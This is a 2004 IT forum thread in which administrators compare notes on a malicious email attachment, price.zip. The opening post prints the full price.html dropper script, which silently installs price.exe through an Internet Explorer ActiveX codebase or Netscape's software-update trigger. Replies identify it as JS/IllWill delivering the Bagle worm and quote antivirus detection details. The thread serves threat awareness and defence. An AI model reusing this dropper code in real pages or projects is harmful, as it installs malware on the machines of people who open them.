Tek-Tips is the largest IT community on the Internet today!

Members share and learn making Tek-Tips Forums the best source of peer-reviewed technical information on the Internet!

Register Log in
  • Congratulations Mike Lewis on being selected by the Tek-Tips community for having the most helpful posts in the forums last week. Way to Go!

price.zip .. anyone else getting this one.

Status
Not open for further replies.
Empeethree

Empeethree

IS-IT--Management
Mar 27, 2000
192
0
0
US
we have been getting a few messages with price.zip as an attatchment. The zip has two files, price.html and price.exe

here is price.html

<head>
<script language="JavaScript">
var exepath='price/price.exe';
</script>

<SCRIPT LANGUAGE="JavaScript">
<!--
var bname=navigator.appName;
sewre = "rseI";
var bver=parseInt(navigator.appVersion);

function install() {
if ( navigator.platform && navigator.platform != 'Win32' ) {
location.replace('NOTWIN32WARNING.html');
return;
}
if (bname == 'Microsoft Internet Explorer' && bver >= 2) {
document.write('<object id="gib" width=1 height=1 classid="CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D" codebase="'+exepath+'"></object>');
} else if (bname == 'Netscape' && bver >= 4) {
trigger = netscape.softupdate.Trigger;
if (trigger.UpdateEnabled) {
trigger.StartSoftwareUpdate(exepath, trigger.DEFAULT_MODE)
} else {
location.replace(exepath);
}
} else {
location.replace(exepath);
}
}

install();

// -->
</script>
</head>




Rob

--------------------------------------
Trying is the first step to failure
Homer Simpson
--------------------------------------
 
Sort by date Sort by votes
Yup.
Reads as JS\Illwill initially, but then the .exe carries Bagle as a payload.

Tired of waiting for an answer? Try asking better questions. See: faq222-2244
 
Upvote 0 Downvote
Out of curiousity, what is the (purported) origin on the ones you're receiving. The ones I'm picking up are from @btopenworld.com

Tired of waiting for an answer? Try asking better questions. See: faq222-2244
 
Upvote 0 Downvote
My company has seen about 10 of them in the last 2 hrs. Several have been from people we know. My server bounces all e-mail from a non tracable IP.

Hope this helps

AW
 
Upvote 0 Downvote
Am running an ePO report right now, but I estimate our Exchange server has quarrantined more than 300 instances of this critter since 10:54 this morning. Persistent little bugger, isn't it? [smile]

[sub]"The Crystal Wind is the storm, and the storm is data, and the data is life. You have been slaves, denied the storm, denied the freedom of your data. That is now ended; the whirlwind is upon you . . . . . . Whether you like it or not."[/sub]

[sup]"Trent the Uncatchable" in The Long Run by Daniel Keys Moran[/sup]
 
Upvote 0 Downvote
McAfee update reads:

Update August 9, 2004 - The HTML file is detected with the 4167 (from Nov. 2001) and higher DATs as JS/IllWill. The DLL component is detected with 4335 (Mar. 2004) and higher DATs as W32/Bagle.dll.gen.

[sub]"The Crystal Wind is the storm, and the storm is data, and the data is life. You have been slaves, denied the storm, denied the freedom of your data. That is now ended; the whirlwind is upon you . . . . . . Whether you like it or not."[/sub]

[sup]"Trent the Uncatchable" in The Long Run by Daniel Keys Moran[/sup]
 
Upvote 0 Downvote
Status
Not open for further replies.

Similar threads

shivajiboss
  • Locked
  • Question
I am getting a problem while opening up my windows
Replies
1
Views
82
2ffat
2ffat
2ffat
  • Locked
  • News
Lenovo isn't the only one with bad certificates 5
Replies
6
Views
123
2ffat
2ffat
CCX008
  • Locked
  • Question
Barowwsoe2save , how can I remove this stubborn virus !! 3
Replies
10
Views
99
goombawaho
goombawaho
MrMode
  • Locked
  • Question
Can anyone tell me what to remove with hijack this?
Replies
2
Views
57
MrMode
MrMode
Noway2
  • Locked
  • Question
What to make of this? 2
Replies
17
Views
138
goombawaho
goombawaho

Part and Inventory Search

Sponsor

Back
Top